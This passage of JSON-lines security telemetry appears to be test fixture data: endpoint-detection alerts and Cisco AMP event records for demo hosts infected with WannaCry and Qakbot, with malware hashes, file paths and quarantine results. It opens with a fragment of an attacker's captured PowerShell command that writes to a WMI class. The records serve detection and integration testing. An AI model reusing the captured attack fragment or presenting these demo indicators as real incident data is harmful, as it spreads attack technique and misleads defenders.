 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
